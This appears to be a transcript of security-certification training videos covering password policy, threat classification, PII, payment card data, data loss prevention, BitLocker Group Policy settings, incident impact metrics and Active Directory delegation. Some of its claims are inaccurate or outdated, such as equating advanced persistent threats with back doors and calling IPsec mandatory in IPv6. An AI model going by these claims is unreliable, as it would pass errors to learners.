Policy Setting, there is the following field: Password will expire in.] I'm going to set that to 30 so that we
require password changes every 30 days for security.
I'm going to set the Minimum password age to 10 days [He repeats the same procedure for the next individual
setting which is Minimum password age.] because I don't want people immediately changing their password to
some variation of what they used before because it's easier for them to remember. The Minimum password
length here – I'm going to bump up to 8 characters for security reasons. I can also ensure that password
complexity requirements are enabled so that we've got to use things like uppercase and lowercase characters
and so on.
The other important thing to bear in mind here is that we've done this in the Default Domain Policy. [He
switches back to the Group Policy Management window.] Even though you can build other GPOs in Active
Directory that might apply to other organizational units and it will let you configure the Password Policy
settings, they don't work. So the only way that we can set standard Password Policy settings for everyone
inside an Active Directory domain is by doing it in a domain-level policy. It will not work in a GPO linked to
an OU even though it looks like it will, if you test it, it will not.
After completing this video, you will be able to recognize various network configurations and perform network
reconnaissance.
Objectives
Exercise Overview
[Topic title: Exercise: Network Architecture and Reconnaissance. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining why IPv6 is considered more secure than IPv4. You'll then explain why
DMZs are relevant. Then you'll outline the Cloud Security options. You will list the differences between log
review and packet captures. And finally, you'll list differences between data retention and data classification.
Now pause the video and perform each of these exercise steps and then come back here to view the results.
Solution
IPv4 was never designed from its inception in the 1970s with security in mind. So all security solutions that
exist today for IPv4 are essentially afterthoughts and Band-aids. IPv6 was designed with security in mind. It
has built-in support for IPsec. IPsec is actually a requirement. IPsec also works with IPv4.
A DMZ is a demilitarized zone. It's a special network segment that sits between the Internet and an internal
network. An external firewall protects the DMZ from the Internet. And an internal firewall protects the internal
network from the DMZ. IT services that should be publically visible should always be placed on the DMZ.
When it comes to the cloud, there are a couple of security options available.
We have on-premises connectivity to the cloud from our local network or our data center. This can be done
through a site-to-site VPN which encrypts the connection or a dedicated leased line which bypasses the
Internet. On the encryption side, there are encryption options for data in transit – so data being transmitted as
well as data at rest – data being stored. We can also encrypt data prior to storing it in the cloud using any
encryption tools that we choose.
Some cloud security providers also offer security as a service in the cloud – things like firewalling, spam
filtering, and virus scanning. Log review and packet capturing are both different from one another. Now
they're both forms of reconnaissance. Logs, however, result from the operation of an operating system – an app
or it could be result of activity auditing. And logs can and should be forwarded to other hosts for safe keeping
especially for devices that exist in a DMZ.
Packet captures, on the other hand, are a copy of network transmissions that can be used to troubleshoot
performance issues as well as to establish a baseline of normal network activity. Data retention is related to
archiving requirements for long-term storage of data that needs to be around. This could be due to legal or
regulatory reasons and it's related to our data backup policy.
Data classification allows us to identify different types of data. Usually this is done by adding metadata, for
example – to files stored on a file server, we might add additional attributes such as the department or project
it's tied to. It's designed for the protection of sensitive information. So certain permissions can be granted to
certain classifications of data. So the two therefore – data retention and data classification – are related.
Table of Contents
During this video, you will learn how to identify assets and related threats.
Objectives
[Topic title: Threat Overview. The presenter is Dan Lachance.] In this video, I'll do a threat overview.
According to ISO document 7498-2, a threat is defined as being a potential violation of security. And, as
cybersecurity analysts, it's our jobs to be able to identify assets and threats to them and to put in place security
controls that can mitigate or completely remove that possibility of threat materialization.
The first thing we have to consider is what are assets? What has value to the organization? Now that can
include numerous things including IT systems that the company relies on, or it could be specific data like
customer shopping habits data. Now then we have to look at what type of data is the most viable because many
organizations produce many different types of data. So we have to think about the IT systems that produce the
data and then the process workflow that results in the data.
So that might mean, for example, a certain web application that employees follow through a specific process to
fill in a form to submit data that ends up resulting in something of value to the organization. Maybe it's in the
accounts payable department or accounts receivable. Asset examples include things like Personally Identifiable
Information or PII. This is any type of information that uniquely identifies an individual, things like in e-mail
address, their financial history, their social security number, and so on.
Then there's corporate data that might be considered confidential. Certainly, things like accounting data would
fall under that category. Data regarding mergers and acquisitions, trade secrets. There's also intellectual
property or IP. And this could be related to industrial processes or methods. Or it could be artistic such as
copyrights for artwork or for music.
Other assets include payment card information. So, if we deal with cardholder data whether they are debit
cards or credit cards, that data has to be stored in a secured manner and transmitted securely. And as such, it
could be very important for an organization to safeguard that type of information. Realized threats will have a
negative effect on business operations. Now this comes in a number of ways such as loss of revenue, such as
when we get malware infections that bring IT systems down for a period of time. It can also include things like
loss of reputation, loss of consumer confidence.
Sources of these threats include malware, social engineering which is trickery of tricking someone to develop
something sensitive that could be some other type of security breach such as a physical security breach. Other
threats include natural disasters like floods or storms, which might result in power outages and of course other
man-made threats such as war and terrorism.
Data needs to be categorized for it to be taken care of properly so that we can mitigate threats against it. Data
categorization uses metadata. Metadata is extra information about the actual data itself. So we could manually
configure metadata about document stored, for instance, on a Microsoft SharePoint Server where we might
select items from a drop-down list maybe to flag a document as being at a certain stage within a business
process.
We could also look at automated solutions like Windows File Server Resource Manager – FSRM. For
example, we might have files that we look at and, if they contain credit card numbers we would flag them as
sensitive. Now, whether we're talking about solutions like SharePoint Server or FSRM, they could both be
manual or automated. We categorize data because then job-based roles allow appropriate access to this
categorized data.
After completing this video, you will be able to recognize known, unknown, persistent, and zero-day threats.
Objectives
So then we take a look at the impact on business operations, business processes, including relevant data. This
way we can focus on selecting the best mitigating security controls to reduce the impact of potential risks.
Known threats include things like viruses that have a known signature that can be detected by a malware
scanner. Another example of a known threat is a firewall misconfiguration. Ideally, we will know about it
before it's known by malicious users that can then take advantage of that firewall misconfiguration.
Unknown threats are called zero-day threats when it comes to malware. This means we've got some kind of an
exploit that's available, but the vendor doesn't yet know about it. Malicious users however do. So they may or
may not require the deployment of malware to actually exploit this vulnerability. So, for example, it would be
a weakness in an operating system that's still isn't known to a vendor.
APT stands for advanced persistent threat. Essentially, it's a back door. Now a back door allows an alternative
way to get into a system. And it's often built by developers during development phases to allow it quickly to
get in and test something while bypassing access control mechanisms. Problem is sometimes those aren't
removed or they could be put in place by malicious software. So, essentially, it would allow attackers to use a
compromised system for a long period of time. And this has happened in the past.
Think about Nortel, for example, where Chinese hackers had compromised their network and been in for
almost a decade. Let's take a look at a threat classification criteria example. So the first thing we have to
consider is the threat source. In this case, let's assume it's external. We then have to think about the threat
agent. How is that being delivered – that threat? How is it being materialized? And in our example, let's say it's
ransomware. Now ransomware is a form of malware that encrypts files and then demands payment to reveal a
decryption key.
So what would the threat motivation be? Because that's the next idea we have to think about. In this case, it
would be financial – receiving a payment and ideally providing a decryption key to the victim after receiving
the payment. The next thing to consider when classifying threats is the threat intention. Is it malicious as is the
case with ransomware where the motivation is financial or is it some kind of an accident?
The next thing we have to think about is the impact that the threat will have against business processes, IT
systems, and data. So will there be any downtime? Will we have denial of service to an IT system that
otherwise would be available for legitimate use? Will we have data disclosure to unauthorized parties or will
there perhaps be illegal use of sensitive information such as Personally Identifiable Information or PII?
So it's important that we categorize and prioritize threats and think about all of the criteria related to threats.
[Topic title: Personally Identifiable Information. The presenter is Dan Lachance.] In this video, I'll discuss
Personally Identifiable Information. In the IT field, Personally Identifiable Information is simply called PII or
P-I-I. These are unique attributes that are related to an individual. PII is stored with some kind of agency or
institution or private sector firm. And there are laws and regulations in place in different industries and
different parts of the world for protection of PII.
One standard is that PII owners must be notified that their personal information is being collected. They also
must be notified about how it's going to be used. Examples of PII include personal information such as – a
person's full name, their birthdate, their driver's license master number, Social Security Number, e-mail
address, their mother's maiden name, and anything related to biometrics like a fingerprint scan or an eye retinal
scan.
PII harvesting, for example, would be used to trick victims into updating passwords on a fraudulent web site.
So the harvesting part comes in because the malicious user is reaping the rewards of somehow tricking people
into divulge sensitive personal information. And often, this could come in the form of an e-mail message that
looks like a legitimate message from the bank asking a user to reset their password, for instance.
The best defense here is user training. User training should emphasize the problems that can occur with e-mail
file attachments, especially those that the user was not expecting, but there are even risks with opening file
attachments a user was expecting. Of course, links to other web sites and e-mail messages should always be
treated very cautiously. And also links posted on social media sites, whether it's Twitter or Facebook,
especially if it relates to an individual might be a way to lure a user into clicking a link, often due to human
curiosity. And then once that happens, the machine could be infected.
PII falls under organizational data classification rules. So, for example, we might configure a PII
confidentiality impact level of low, medium, or high depending on the content within database records or files
on a file server. PII can be stored on premises. And depending on rules or regulations and laws about how that
PII is treated, when it's on premises it might need to be encrypted. There might need to be backup copies stored
off site and so on.
In the cloud, we have to think about storage of PII where it might not be allowed due to laws and regulations.
Or if it is, it might be required on cloud provider data center equipment within national boundaries. And again,
encryption for data at rest or stored data is often associated with PII as well as while it's being transmitted.
PII owners, as we mentioned, must be notified of how their PII will be used. So, if their personal information is
going to be shared with other vendors within or outside of national boundaries, they must know about it and
they must consent to this usage.
After completing this video, you will be able to explain payment card data.
Objectives
[Topic title: Payment Card Information. The presenter is Dan Lachance.] In this video, I'll talk about Payment
Card Information. Payment card types include things like credit cards, debit cards, and gift cards to name a
few. It's important that there is consumer trust for this system to work – trust in the cards, the data stored on
them, and the systems that are used to pay for services and products. It's also very convenient for consumers
even across the Internet to use a payment card to purchase something. But with good things come bad things in
terms of malicious users.
Payment cards are a large portion of cybercrime, especially organized crime with different groups around the
world. For example, Carder's Market is a closed group on the Internet where things like credit card PINs and
PayPal account credentials are for sale to the highest bidder. Now, it's hard to believe that this would actually
exist on the Internet and anyone could connect from anywhere. But that's just it – not anyone can connect. You
have to be invited and there's very careful scrutiny by other members to make sure that it's not Law
Enforcement trying to infiltrate these groups. And often, payment for these types of nefarious items is done
through Bitcoins. That's because Bitcoin payments are really unregulated. However, transactions are normally,
publically recorded on block chain. But, you know, there are ways around everything. This could be
circumvented through Bitcoin using a tumbler or an anonymizer.
Magnetic strip cards generally don't encrypt transmitted data to the terminal. But the reason I say general is
because there are different proprietary solutions for strip cards and the terminal devices that they are used
against. But generally, it is not encrypted. Magnetic strip cards can contain any type of information, really. It
depends on what the creator decides to burn into the magnetic strip – things like the type of card, account
numbers, account types, the account holder name, perhaps an expiration date for the card, even a PIN, or a
hash of the PIN – but it varies.
Chip cards on the other hand are also called smart cards. And they do encrypt data transmitted to the terminal.
Chip cards are interesting because they actually contain a very thin microchip embedded within the card.
However, these aren't quite as widely used as the magnetic strip cards yet in all parts of the world, but it is
changing. The good thing about chip cards is they are much more difficult to forge than magnetic strip cards
are.
NFC stands for Near Field Communication. And this is a contactless payment mechanism that's becoming
more and more popular. It's a short-range wireless communication approximately 20 centers maximum. And
this is one of the reasons why it can be difficult to intercept signals because someone would have to be very,
very close. However, it is possible.
There are also Smartphone apps that allow you to use NFC for payment. And it will automatically take funds
out of a certain account through your bank or through your credit card and so on. So transmissions are
encrypted. However, this is one of those things. For example, on a Smartphone that you should disable if you
don't use it. That's part of hardening. It's turning off things that we don't use to reduce the attack surface.
PCI DSS stands for Payment Card Industry Data Security Standard. These are security standards that need to
be met by merchants, financial institutions, or point-of-sale vendors that work with cardholder data – whether
it's credit cards or debit cards and so on. So PCI DSS requirements include the use of network and host base
firewalls configured properly. Configured properly means that a firewall by default should deny everything.
And you should only allow specific things that you know should be allowed into or out of a host or a network.
PCI DSS requirements also require hardening in the sense of changing system defaults like default passwords,
default names of wireless networks, and so on. Transmission of cardholder data must always be encrypted.
And in some cases, it will have to be encrypted as it's stored, as well. Another requirement is having up-to-date
antimalware solutions running on systems related to cardholder data and the use of unique user accounts at that
specific organization. So we can track who did what at what date and time.
Another requirement – and there are many beyond what we're listing here – would include restricted physical
access to cardholder data itself. Now that's where the encryption of data at risk kicks in. Because if by some
chance a malicious user gets physical access to cardholder data – if it's encrypted, that's yet another hurdle that
they must circumvent. And ideally, if it's strong encryption, they won't be able to crack it.
Another requirement is auditing to track who's been doing what as related to cardholder information and
periodic security testing.
[Topic title: Intellectual Property. The presenter is Dan Lachance.] In this video, I'll talk about intellectual
property. Technicians often refer to intellectual property as IP, not to be confused with Internet Protocol. IP is
a type of data. At the industrial level, it would include things like trade secrets, patents, and trademarks. At the
artistic level, it relates to copyrights. Some examples of intellectual property would include things like secret
ingredients or recipes or music. Paintings also fall under intellectual property and it would be subject to
copyright law just like music would.
Scientific research and the results thereof are also considered intellectual property as are specific industrial
processes used by certain organizations, for example, in the manufacturing process. These are the types of
things that we would want to keep secret to remain competitive. Now there might be some intellectual property
ownership issues. Consider the example of university research data created through government funding that
finds some kind of important medical result.
Who owns that intellectual property – the university, the researchers, or the government that funded the
research? DRM stands for Digital Rights Management and this is another aspect of protecting intellectual
property. It prevents things like piracy. If you think back in the days of software being distributed on floppy
disks, vendors back then would use methods such as writing the files to those floppy disks in nonstandard
ways and that was their form of copyright protection at the time.
Another example would be things like digital watermarks on images or videos to prevent piracy such as, movie
screenings. Software and gaming Digital Rights Management often these days checks in with an Internet
server first before commencing or granting access to the software, or in the case of gaming, before the game
will begin. An example of this would include Microsoft Product Activation where if we were to install – for
example – a Windows operating system, then we would have to make sure it gets registered with Microsoft's
activation servers before we can fully use that operating system and receives updates.
In this video, you will learn how to control how valuable data is used.
Objectives
[Topic title: Data Loss Prevention. The presenter is Dan Lachance.] Aside from people, the most valuable
assets organizations have is information. In this video, I'll discuss data loss prevention. Data loss prevention is
often referred in the industry to as DLP. This controls how valuable data is used and protected. It deals with
intellectual property, confidential-corporate data, as well as personally identifiable information or PII.
DLP prevents data leakage – data disclosure – outside of the organization to unauthorized users. DLP risks
include things such as malware – an infected or compromised system or network might use spyware agents
installed on hosts to gather data that is normally protected. And therefore, that data would then be disclosed
outside of the organization. Naturally, proper and up-to-date malware scanners help mitigate that risk.
Other ways that data loss can occur are through social media links. So, for example, users using Facebook or
Twitter might post sensitive information there either intentionally or unwittingly. So we need controls in place
to watch for that. Then there are things like mobile devices. These are a big risk in today's computing
environment, yet at the same time it allows people to be very productive and mobile at the same time.
Laptops, tablets, and smartphones are computers, of course, and they should be treated as such. Most people
are familiar with the fact that yes, laptops and tablets are computers. A lot of people don't seem to consider
smartphones to be full-fledged computers, although really they are. So as such they need things like personal-
based firewalls installed, antivirus solutions installed, and so on. There are many infections for smartphones, so
user awareness is key here.
Other DLP risks include removable media such as USB flash drives. So, for instance, we might have a user
that copies sensitive data to your USB thumb drive and then takes that thumb drive elsewhere. And this has
been known to happen in many different cases even with sensitive military information. Risk origin usually
ends up going back to humans. It's usually us that cause these security breaches and it results in data loss.
Now think about examples that we've seen in the media even over the last few years such as the target security
breach where 110 million customer records were stolen. Now everybody needs to be involved with IT security
to prevent that type of things from happening, especially at that scale. And, when we say everybody, we mean
end users, management, the board of directors. Everybody needs to be involved with IT security and awareness
is key.
Data loss prevention can be applied to data in use. That would be data being processed, for example, within an
application. Data loss prevention can also apply to data in transit such as encrypting data or limiting where data
can be sent or received over a network. For example, sensitive files might be able to be attached to e-mail
messages but the recipients might have to reside within the organization.
Then there's data at rest where we store data and it must be protected. Normally, this comes in the form of
making sure the data is encrypted when it's stored and also auditing access to that data. To implement data loss
prevention, the first thing we do is identify the data that needs to be protected. We then identify threats against
the data and then apply our DLP solution. As with all security controls, we need to monitor our DLP solution
as an ongoing task for effectiveness.
Now examples of this include things like Microsoft's Group Policy settings where we can control removable
media. Here, in the Local Group Policy Editor [The Local Group Policy Editor window is open. Running
along the top of the window is a menu bar. The window is divided into two sections. The first section is the
navigation pane which contains Local Computer Policy node which further contains two subnodes, Computer
Configuration and User Configuration. The Computer Configuration subnode contains three folders named
Software Settings, Windows Settings, and Administrative Templates. The User Configuration subnode contains
three folders named Software Settings, Windows Settings, and Administrative Templates. The second section is
the content pane which displays the information regarding Local Computer Policy. It contains Name tab
which has two options named Computer Configuration and User Configuration.] whether we're editing local
group policy which we are here or in Active Directory, we can control access to data being written to or read
from USB devices. For example, under Computer Configuration in the left hand navigator, I'm going to
expand Administrative Templates. And, under there, [He clicks the Administrative Templates which includes
various subfolders such as Control Panel, Network, and Windows Components. The Windows Components
subfolder further includes various subfolders such as BitLocker Drive Encryption and Desktop Window
Manager.] I'm then going to open up Windows Components and I'm going to look at BitLocker Drive
Encryption.
Now, in the Windows world, BitLocker allows us to encrypt the entire disk volumes. So, when I expand
BitLocker Drive Encryption, I can see Fixed Data Drives, Operating System Drives, and what we're looking
for – Removable Data Drives. Now, when I select Removable Data Drives on the left, on the right I get a
handful of settings. [He refers to the content pane which includes information related to the Removable Data
Drives. A table is displayed with column headers titled Setting, State, and Comment. The table includes
various rows under Setting such as Control use of BitLocker on removable drives and Deny write access to
removable drives not protected by BitLocker. He clicks the Deny write access to removable drives not
protected by BitLocker whose State is Not configured and Comment is No. The Deny write access to
removable drives not protected by BitLocker dialog box opens. The window contains two buttons named
Previous Setting and Next Setting adjacent to the Deny write access to removable drives not protected by
BitLocker message. Under that there are three radio buttons named Not Configured, Enabled, and Disabled.
The Not Configured radio button is selected by default. The page further contains two sections titled Options
and Help.] For example, one of them is to deny write access to removable devices that aren't protected by
BitLocker encryption.
So, to prevent data loss or disclosure of sensitive information outside of the organization, we might require
encryption to be used on removable thumb drives before a data can be written to them.
Mobile devices are very convenient and can make people productive, but at the same time it introduces new
challenges and risks for IT security specialists. There are challenges with the BYOD environment. Bring Your
Own Device – where users can bring personal mobile devices to be used for work purposes. Now, when this is
done, the organization should be using some kind of centralized mobile device management or MDM solution
where, for instance, a VPN connection would be triggered on your smartphone when a certain app that requires
access is started.
Also strong device authentication requirements should be put in place such as PKI certificate authentication or
multifactor authentication. The device should be encrypted. We also should have remote wipe capabilities. So,
if the device is lost or stolen, we can either wipe just the company data from it or basically do a factory reset
on the device to prevent sensitive data loss.
We can also control app installations on mobile devices using our centralized MDM tool so that users don't
install apps that might be malicious. We can also do things like disable Bluetooth, disable the camera, and
many other options. Device partitioning or containerization is very important with mobile devices. It allows us
to perform a selective wipe. So we might, for instance, have a corporate partition on a mobile device where
we've got corporate apps, settings, and data. And then there's a personal partition with personal apps, settings,
and data.
So, if the smartphone – for instance – is lost, we could perform a selective wipe against the corporate partition
only. Solutions can also prevent data from being forwarded. In the case of things like e-mail or in the case of
printing, copying and pasting or even storing data in alternate locations maybe in the corporate partition on a
smartphone, corporate sensitive data might not be allowed to be stored in other locations such us a user's
personal Dropbox account.
[Topic title: Prevent Data Storage on Unencrypted Media. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to prevent data storage on unencrypted media. Here, on my Windows server, I'll begin by
going to the Start button in the bottom left and I'll type in "group". [He types group in the Search bar.]
Now I'm going to start the Group Policy Management editor so that we can turn on some BitLocker Drive
Encryption options as per our needs. [The Group Policy Management window opens. Running along the top of
the page is the menu bar which contains menu options such as File, Action, View, Window, and Help. The
window is divided into two sections. The first section is the navigation pane which contains Group Policy
Management node which contains Forest quick24x7.com and Sites nodes. The Forest quick24x7.com node
contains Domains subnode which further contains quick24x7.com subnode. The quick24x7.com subnode
includes various folders such as Default Domain Policy, Boston, and Group Policy Objects. The Default
Domain Policy is selected by default. The second section is the content pane which displays information of the
option selected in the first section. The content pane contains four tabs named Scope, Details, Settings, and
Delegation. The Scope tab is selected by default.] So, in the left hand navigator where I see a list of my GPOs
or Group Policy objects, I'm going to right-click on the Default Domain Policy. This GPO will apply to all
users and devices within the domain. So I'm going to right-click on the GOP [He right-clicks the Default
Domain Policy folder. As a result, a shortcut menu appears which includes various options named Edit,
Enforced, and View.] and chose Edit. That opens up the Group Policy Management Editor screen.
Now BitLocker options are tied to the computer. They're not tied to the user like encrypting file system or EFS
is. So therefore, on the left, that tells me I'm not going to go down under User Configuration but instead under
Computer Configuration. So that's correct. I'm going to expand the Polices under Computer Configuration
under which I'll then open up Administrative Templates - Windows Components. And now we see on the left
BitLocker Drive Encryption.
Now, when we select BitLocker Drive Encryption, we see a number of settings over here on the right such as
to store BitLocker recovery information in Active Directory and so on. But we've also got three folders of
BitLocker settings, one for Fixed Data Drives in a machine, another category for Operating System Drives in
machine, and finally what we're looking for – Removable Data Drives. Let's open that up by double-clicking.
The first thing I want to do is go into the option here that we need. It's called...I'll just double-click on it –
Deny write access to removable drives not protected by BitLocker. So what I want to do is make sure that that
option is Enabled. [He selects the Enabled radio button.] Once the option is Enabled and we save our
configuration, [At the bottom of the Deny write access to removable drives not protected by BitLocker window
are three buttons named OK, Cancel, and Apply. He clicks the OK button.] which simply means clicking OK,
so we can now see here that the State column will have Enabled once that's been turned on. It's a matter of
Group Policy refreshing on other machines that are affected by this GPO before they put the setting into effect.
Now that can take anywhere from 90 minutes to many hours, maybe even days in some multisite
environments. So check your network documentation to see how long that should take. [The Command
Prompt window opens.] Now that's fine for configuring BitLocker settings. But how do we actually turn it on?
Well, on a single Windows machine from the command line, we could use the manage-bde command line
tool [He executes the following command line: manage-bde.] where BDE stands for BitLocker Drive
Encryption.
If I just type that in without any parameters, notice it pops up a help screen. [He refers to the output of the
command.] So, from the help screen, I can clearly see the parameters that will enable BitLocker Drive
Encryption, in this case, "-on" for a specific a volume or I could turn it off and so on. Now there's not an easy
way to do this built directly into Group Policy. What we could do is create a script that uses the manage-bde
command line tool and that script could be delivered and run through Group Policy for machines.
In this video, you will learn how to determine the effect of negative incidents.
Objectives
[Topic title: Scope of Impact. The presenter is Dan Lachance.] Today's organizations face many potential
threats against their IT systems and data. In this video, we will talk about the scope of impact.
The first thing to do is to look at assets that have value to the organization. Secondly, we then identify threats
related to those assets, which allows us to then prioritize those threats so that we know where to focus
resources and energy. We then need to determine the business impact or the scope. So, if a threat materializes
against an asset, does it affect one user, does it affects an internal user or millions of customers? Is it affecting
one computer on an entire network or an entire IT ecosystem? We have to think very carefully about what is
being impacted when negative incidents occur.
Downtime always has a financial impact because time is money. So whether that is an e-commerce web site
that's down for a few hours and thus can't sell things to customers on the Internet. Or, if we've got some kind of
a payment system that's unavailable, then customers can't buy something and it ends up being very irritating to
customers. And part of what we want to do to retain customers is not irritate them.
Recovery time is related to incident response. This has to be done proactively, has to be planned in terms of an
incident response policy so that when these things occur, the appropriate technicians know their roles and
know what to do to get systems or data up and running as quickly as possible. Now, in terms of individual
components like for servers and network equipment, we should consider the MTTR – the mean time to
recovery. We should also think about the RTO – recovery time objective – in general when negative incidents
occur.
The recover time objective really stipulates the maximum tolerable amount of downtime, let's say, for an e-
commerce web site before it has a serious negative impact on the organization. The SLA or service-level
agreement is a contractual document between a service provider and a service consumer and it can be
negotiated. Often it references details such as downtime that is to be expected if it relates to IT services. So
let's talk about this in the context of an organization purchasing public cloud provider services.
So the public cloud provider SLA to the consumer will have guaranteed uptime. So ideally we'll have very
minimal downtime. There's also items related to response time not just for IT systems to make sure that they're
responsive over the Internet to the cloud but also response time for technical support when we should expect to
get support from the provider. Then, of course, the SLA has a section that deals with consequences. Now the
SLA isn't just about everything being on the back of the provider. Consequences normally turn out to be
credits to the consumer, for example, for the next month's usage of cloud services.
Pictured here, I've gone into my web browser and popped up the SLA for Microsoft Azure cloud computing
specifically for virtual machines. [The SLA for Virtual Machine web page is open. Running along the top of
the Microsoft Azure web page there are various tabs named Why Azure, Resources, and Support. The Support
tab is selected by default. The rest of the page contains information related to SLA for Virtual Machines.] So
we can see here that it talks about 99.95% uptime. And, as I go through this, [The page includes various
expandable sections such as introduction, General Terms, and SLA details.] I see the sections within the
document. So I can see a definition of terms, downtime, service credits [The SLA details section is expanded
which includes various information such as Additional Definitions, Downtime, and Service Credit.] that would
be applied if Microsoft doesn't meet up to their stipulations inside the SLA, and so on.
So there are various type of SLAs. You might even have one within your organization if you're large enough
because departmental charge back might be used for IT services. When bad things happen to IT systems or
data, we have to think about the economic impact. The SLE is the Single Loss Expectancy. This is a value that
is derived by taking a look at historical data as well as current data and determining what type of numeric
value, monetary value will be associated with some kind of a negative incident.
The ARO or the ARO is the Annual Rate of Occurrence that we could expect for negative incident. So
therefore, the ALE is the Annual Loss Expectancy from negative incidences occurring. So the AL is derived by
taking the Single Loss Expectancy and multiplying it by the annual rate of occurrence. So this is used to
determine if the security controls that we have in place provide a cost benefit. We don't want to pay more for a
security control to protect an asset when the asset isn't worth that much or the likelihood of a failure. And then
recovering it doesn't at least make sense from a cost perspective. We don't want to pay more for security
controls when the asset is worth.
The other thing to consider in terms of the impact of negative events is data integrity. If we've got a security
breach, then data trustworthiness might go out the window depending on what we've got in place. So we might
have audit trails to track activities so that we can trust and rest assured that data has not been tampered with or
disclosed to unauthorized parties. Then there are hashes and signatures.
So, for example, we might use file hashes against a file that results in a unique value that is the hash. And,
when we compute that again in the future if it's different from the original hash, we know something has
changed in the file. For example, at the e-mail level, we might look at digital signatures where the private key,
which comes from a PKI certificate, which contains private and public key pairs. The private key is used to
generate a unique digital signature, for instance, in a mail message. The recipient verifies the authenticity of
that signature by using the related public key.
Finally, on critical system processes, we should have failover mechanisms in place. This could be as simple as
using failover cluster where you've got at least two servers offering the same, let's say, line of business
application. If one server fails, the other one picks up and users are redirected to the running server. Of course,
for that to work effectively, all servers within the cluster should be using the same shared storage so they have
the same up-to-date data. But, in some cases, you might use data replication across different regions or even to
an alternate site. A hot site is another site that we can use for business operations if the primary site fails for
some reason.
But the reason it's called a hot site is because it's ready to go at a moment's notice. So we've got a facility. It's
got equipment, software. It's even got up-to-date data. We don't rely on data backups with a hot site. Now the
way that we have the up-to-date data is by having replication that occurs constantly from the primary site to
this alternate hot site. Ideally, it would be synchronous replication, which means when data is written in the
primary site, at the exact same time it's also written to the alternate site. If there's a bit of a delay with the
replication, then we would call it asynchronous replication.
In this video, find out how to identify stakeholders related to incident response.
Objectives
[Topic title: Stakeholders. The presenter is Dan Lachance.] In this video, I'll discuss stakeholders.
Stakeholders have a vested interest in asset protection. And they should be involved in all project phases. Now
an IT project should include security in all phases from its inception all the way out to the deployment of a
solution, the ongoing maintenance, and the inevitable decommissioning. Security can't be an afterthought. It's
got to be always a part of every phase of a project. Now stakeholders have an interest then in our IT assets
whether they be specific IT business processes or whether they are related to IT systems or data.
Stakeholders should also be involved in security policy creation. Organizational security policies dictate what
is acceptable and what is not and essentially how systems and data are protected. Now security policies don't
just get created and then they're good to go and never get changed or revisited. So making changes and
reviewing security policies is an ongoing task that never ends. And one of the reasons for this is because
technology is changing constantly – so as it relates to a specific business if it will be different ways of using
technology that support business objectives. And, as a result, there could be new threats that might materialize
that were not there before. Think of when mobile phones, smartphones began to be used in business
environments. That introduces a new set of a tax that are potentially visible that were not there before because
we have another computing device that lot of people just aren't treating as a computing device.
They're not thinking about the fact that it could be infected with malware as easily as a Windows computer
could be. Stakeholders also need to be involved with communication regarding security incidents that occur. In
some cases, this might be mandated by law. So, when there's a security breach, affected stakeholders must be
notified.
First part of working with stakeholders is identifying who they are and what interests they have in our IT
systems and data. This would include internal stakeholders like human resources staff, legal, marketing,
management, and then – of course – externally customers. There needs to be a formal change management
process within organizations. And, if we look at frameworks like ITIL, they stipulate this very clearly. So all
changes that need to made need to be captured accordingly. And they need to go through the proper approval
process before they are made.
Now any changes that are made need to be documented. And this needs to be made available to stakeholders.
There also needs to be regular meetings that are held especially after incidents. But really this should be an
ongoing task all of the time. With regular meetings, some or all stakeholders might be involved at the same
time or at different times – so different meetings or one big meeting. And, in these meeting, lessons learned
from incidents can be reviewed to improve business processes and security related to them.
Upon completion of this video, you will be able to recognize incident response roles.
Objectives
[Topic title: Role-based Responsibilities. The presenter is Dan Lachance.] In this video, I'll talk about role-
based responsibilities.
The principle of least privilege stipulates that only required permissions to perform a specific business related
task should be granted and no more. This also means that data needs to be provided on a need-to-know basis
only. Separate user accounts allow for role-based responsibilities. It allows for auditing. So we can track which
users performed which actions against systems or files on certain dates and times. If everyone is logging in
using the same user account, this can't be done.
This is especially important with administrative accounts where all too often the same Windows Administrator
account or Linux root account keeps getting used by different administrators. This is not recommended. Role-
based responsibilities fall under many different categories including technical. With technical role-based
responsibilities, there should be separate administrative accounts as we've mentioned such as the Windows
Administrator account and the Linux root account not being shared by multiple admins.
Administrative delegation allows other administrators to take control of some aspect of an IT system. An
example would be an Active Directory where we could delegate security permissions to another administrator
to manage a different organizational unit so that they could work with user accounts and groups and so on in
Active Directory only within a certain area. So, as an example here in Active Director Uses and
Computers, [The Active Directory Users and Computers window is open. Running along the top of the page is
a menu bar which contains File, Action, View, and Help menu options. The window is divided into two
sections. The first section is the navigation pane which contains a node named Active Directory Users and
Computers, a folder named Saved Queries folder, and a subnode named fakedomain.local. The
fakedomain.local subnode includes various folders such as Domain Controllers, ProjectManagers, and Users.
The Users folder is selected by default. The second section is the content pane which displays user groups in a
tabular format. The column headers are Name, Type, and Description. The rows under Name includes
Administrator, Guest, and HelpDesk.] I've got a group called HelpDesk. And I want to make sure that they are
delegated permission to the ProjectManagers OU.
So I'm going to right-click on the ProjectManagers OU and choose Delegate Control [As a result, Delegation
of Control Wizard opens. At the bottom of the wizard there are four buttons named Back, Next, Cancel, and
Help. He clicks the Next button.] and click Next. And, for Selected users and groups, [He refers to the
Selected users and groups text box which contains Add and Remove buttons at the bottom of the text box. He
clicks the Add button.] here I'm just going to type in help. [The Select Users, Computers, or Groups dialog
box opens. The dialog box contains two fields and one text box. In the Select this object type field, Users,
Groups, or Built-in security principals is selected by default and adjacent to that is an Object Types button. In
the From this location field, fakedomain.local is selected by default and adjacent to that is a Locations button.
In the Enter the object names to select (examples) text box, he types help and adjacent to that there is a Check
Names button. At the bottom of the dialog box are three buttons named Advanced, OK, and Cancel.] And let it
find the helpdesk group [He types help in the text box and clicks the Check Names button which finds the
HelpDesk group. And he clicks the OK button.] and I'll OK that and continue on by clicking Next. [The
HelpDesk (FAKEDOMAIN\HelpDesk) is added in the Selected users and groups text box. He clicks the Next
button.] And maybe what I want the helpdesk to be able to do for, [The Delegation of Control Wizard
contains two radio buttons. The first radio button is named Delegate the following common tasks. The second
radio button is named Create a custom task to delegate. The first radio button includes various check boxes
such as Reset user passwords and force password change at next logon and Modify the membership of a
group.] let's say, users that are project managers is reset user passwords and maybe Modify the membership of
a group. And I'll just proceed through the wizard. [He selects the Reset user passwords and force password
change at next logon and Modify the membership of a group checkboxes. And clicks the Next button and then
Finish button.] And now it's done.
So what we've just modified is an ACL – the access control list – in Active Directory for that organizational
unit so that the helpdesk members can modify user accounts in certain ways. But ACLs can apply to web
applications, databases, file servers, and so on. So, for role-based responsibilities, then it's important that our
